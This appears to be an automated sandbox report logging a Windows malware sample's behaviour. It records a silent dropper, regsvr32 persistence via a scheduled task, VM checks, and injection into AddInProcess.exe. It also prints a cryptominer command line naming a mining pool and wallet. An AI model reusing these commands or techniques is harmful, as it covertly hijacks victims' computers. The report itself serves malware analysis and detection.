          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe Window / User API: threadDelayed 7640
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe Window / User API: threadDelayed 2179
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe Window / User API: foregroundWindowGot 1751
          Source: C:\Windows\System32\regsvr32.exe Window / User API: threadDelayed 9654
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3533
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6219
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7552
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1942
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8574
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 616
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8288
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-G7S57.tmp\_isetup\_setup64.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_shfoldr.dll
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-G7S57.tmp\_isetup\_shfoldr.dll
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-T07R8.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-H1DAG.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-G7S57.tmp\_isetup\_isdecmp.dll
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_isdecmp.dll
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_setup64.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\9mpr_8.ocx (copy)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe TID: 5832 Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe TID: 708 Thread sleep time: -22136092888451448s >= -30000s
          Source: C:\Windows\System32\regsvr32.exe TID: 5792 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59875s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59766s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59656s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59547s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59437s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59326s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59218s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59109s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -58891s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -58766s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -58641s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -58531s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -58422s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -58312s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -58203s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -58094s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -57985s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -57875s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -57766s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -57641s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -57516s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -57406s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -57296s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -57188s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -57063s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -56938s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -56828s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -56719s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -56594s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -56485s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 5792 | Thread sleep time: -360000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59889s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59781s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59672s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59562s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59453s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59344s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59234s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -1199359s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -1199249s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -1199139s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59876s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3284 | Thread sleep time: -59751s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 | Thread sleep count: 3533 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 | Thread sleep count: 6219 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676 | Thread sleep count: 7552 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676 | Thread sleep count: 1942 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6276 | Thread sleep count: 8574 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5964 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4912 | Thread sleep count: 616 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5944 | Thread sleep count: 8288 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5536 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Windows\System32\regsvr32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 60000
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59875
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59766
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59656
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59547
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59437
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59326
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59218
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59109
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59000
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 58891
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 58766
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 58641
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 58531
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 58422
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 58312
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 58203
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 58094
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 57985
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 57875
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 57766
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 57641
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 57516
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 57406
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 57296
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 57188
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 57063
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 56938
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 56828
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 56719
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 56594
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 56485
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 180000
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59889
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59781
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59672
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59562
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59453
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59344
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59234
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 1199359
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 1199249
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 1199139
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59876
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 59751
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: Stamp_Setup.tmp, 0000000A.00000002.2223623641.00000000005EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yur
Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1776684809.000002DD74555000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1654868087.000002DD74574000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1830638357.000002DD74555000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1655643471.000002DD74575000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe, 00000000.00000003.1655864038.000002DD74575000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Stamp_Setup.tmp, 0000000A.00000002.2223623641.00000000005EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yKr
Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: regsvr32.exe, 0000000E.00000003.3031881382.000000001B66E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Process token adjusted: Debug
Source: C:\Windows\System32\regsvr32.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe | Network Connect: 140.82.121.4 443
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 93.88.203.169 39001
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 185.199.110.133 443
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\regsvr32.exe | Thread register set: target process: 6860
Source: C:\Windows\System32\regsvr32.exe | Thread register set: target process: 6744
Source: C:\Windows\System32\regsvr32.exe | Thread register set: target process: 1060
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: D6E6314010
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: E7D1259010
Source: C:\Windows\System32\regsvr32.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 5D09F5F010
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\u9KSgzq29lys.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp | Process created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
          Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
